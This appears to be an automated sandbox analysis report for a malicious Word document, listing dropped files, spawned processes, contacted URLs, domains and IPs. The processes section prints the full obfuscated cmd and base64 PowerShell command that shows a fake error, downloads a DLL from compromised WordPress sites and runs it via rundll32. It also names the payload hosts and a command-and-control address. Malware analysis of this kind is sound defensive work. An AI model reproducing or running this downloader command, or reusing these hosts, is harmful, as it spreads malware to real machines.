Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
79a2gzs3gkk.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Central ROI payment
Planner Money Market Account azure Metal value-added Latvia next-generation algorithm, Author: Elisa Cisneros, Template: Normal.dotm,
Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 12:16:00 2021, Last
Saved Time/Date: Fri Jan 22 12:16:00 2021, Number of Pages: 1, Number of Words: 4060, Number of Characters: 23145, Security:
8
|
initial sample
|
||
C:\Users\user\Snuvw2w\V4651pz\H64C.dll
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0E909297-30AB-4901-9D2A-3CE504568F55}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BE4101D0-AA40-4E61-A4A8-E94B34BC975F}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\79a2gzs3gkk.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13
2020, mtime=Wed Aug 26 14:08:13 2020, atime=Mon Jan 25 01:03:33 2021, length=178176, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NSXIKQWUQAVGAKAOHWPT.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$a2gzs3gkk.doc
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwAgACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA=
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwAgACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA=
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZ
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzU
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZ
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',iaFY
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',WysFLGeRRae
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',ZENT
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
There are 9 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://www.bimception.com
|
unknown
|
||
http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
|
unknown
|
||
https://bbjugueteria.com/s6kscx/Z/
|
unknown
|
||
http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.9
|
unknown
|
||
http://coworkingplus.es/wp-admin/FxmME/
|
104.21.89.78
|
||
http://armakonarms.com/wp-includes/fz/
|
45.143.97.183
|
||
http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.9.1
|
unknown
|
||
https://armakonarms.com/wp-content/uploads/2020/11/winmark.png
|
unknown
|
||
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
|
unknown
|
||
https://armakonarms.com/brands/
|
unknown
|
||
https://armakonarms.com/iletisim/
|
unknown
|
||
http://armakonarms.com/wp-includes/wlwmanifest.xml
|
unknown
|
||
http://armakonarms.com
|
unknown
|
||
http://silkonbusiness.matrixinfotechsolu
|
unknown
|
||
https://armakonarms.com/comments/feed/
|
unknown
|
||
http://silkonbusiness.matrixinfotechsolution.com
|
unknown
|
||
https://armakonarms.com/wp-content/uploads/2020/11/winmark-100x100.png
|
unknown
|
||
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=4.9.
|
unknown
|
||
http://homecass.com/wp-content/iF/P
|
unknown
|
||
https://armakonarms.com/urun-kategori/pump-action-2/
|
unknown
|
||
http://homecass.com/wp-content/iF/
|
unknown
|
||
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=4.9.
|
unknown
|
||
http://armakonarms.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
|
unknown
|
||
http://armakonarms.com/wp-includes/js/wp-embed.min.js?ver=5.6
|
unknown
|
||
http://alugrama.com.mx
|
unknown
|
||
https://armakonarms.com/urun-kategori/short-pump-action/
|
unknown
|
||
https://armakonarms.com/feed/
|
unknown
|
||
http://armakonarms.com/wp-content/themes/neve/assets/css/woocommerce.min.css?ver=2.10.0
|
unknown
|
||
https://armakonarms.com/wp-json/
|
unknown
|
||
http://coworkingplus.es
|
unknown
|
||
https://armakonarms.com/urun-kategori/semi-auto/
|
unknown
|
||
http://armakonarms.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
|
unknown
|
||
https://armakonarms.com/
|
unknown
|
||
https://www.bimception.com/wp-admin/sHy5t/
|
unknown
|
||
https://armakonarms.com/wp-content/uploads/2021/01/armakon.png
|
unknown
|
||
http://silkonbusiness.matrixinfotechsolution.com/js/q26/
|
166.62.10.32
|
||
http://armakonarms.com/wp-content/themes/neve/style.min.css?ver=2.10.0
|
unknown
|
||
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
|
unknown
|
||
http://armakonarms.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6
|
unknown
|
||
http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
|
unknown
|
||
https://armakonarms.com/xmlrpc.php?rsd
|
unknown
|
||
https://bbjugueteria.com
|
unknown
|
||
http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.9.1
|
unknown
|
||
http://195.159.28.230:8080/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/
|
195.159.28.230
|
||
http://armakonarms.com/wp-content/themes/neve/assets/js/build/modern/frontend.js?ver=2.10.0
|
unknown
|
||
http://alugrama.com.mx/t/2/
|
162.241.61.203
|
||
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=4
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
https://bbjugueteria.comh
|
unknown
|
||
http://www.piriform.c3#
|
unknown
|
||
http://www.piriform.com/
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
https://sectigo.com/CPS0D
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
http://www.piriform.com/ccleanerv
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
https://www.bimception.comhrsZ
|
unknown
|
||
https://api.w.org/
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.hotmail.com/oe
|
unknown
|
||
http://gmpg.org/xfn/11
|
unknown
|
||
https://www.cloudflare.com/5xx-error-landing
|
unknown
|
||
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
||
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
|
unknown
|
There are 59 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
silkonbusiness.matrixinfotechsolution.com
|
166.62.10.32
|
||
armakonarms.com
|
45.143.97.183
|
||
bimception.com
|
162.241.224.176
|
||
alugrama.com.mx
|
162.241.61.203
|
||
coworkingplus.es
|
104.21.89.78
|
||
bbjugueteria.com
|
162.241.60.240
|
||
www.bimception.com
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
162.241.60.240
|
unknown
|
United States
|
unknown
|
||
162.241.61.203
|
unknown
|
United States
|
unknown
|
||
195.159.28.230
|
unknown
|
Norway
|
unknown
|
||
162.241.224.176
|
unknown
|
United States
|
unknown
|
||
45.143.97.183
|
unknown
|
Turkey
|
unknown
|
||
104.21.89.78
|
unknown
|
United States
|
unknown
|
||
69.38.130.14
|
unknown
|
United States
|
unknown
|
||
166.62.10.32
|
unknown
|
United States
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
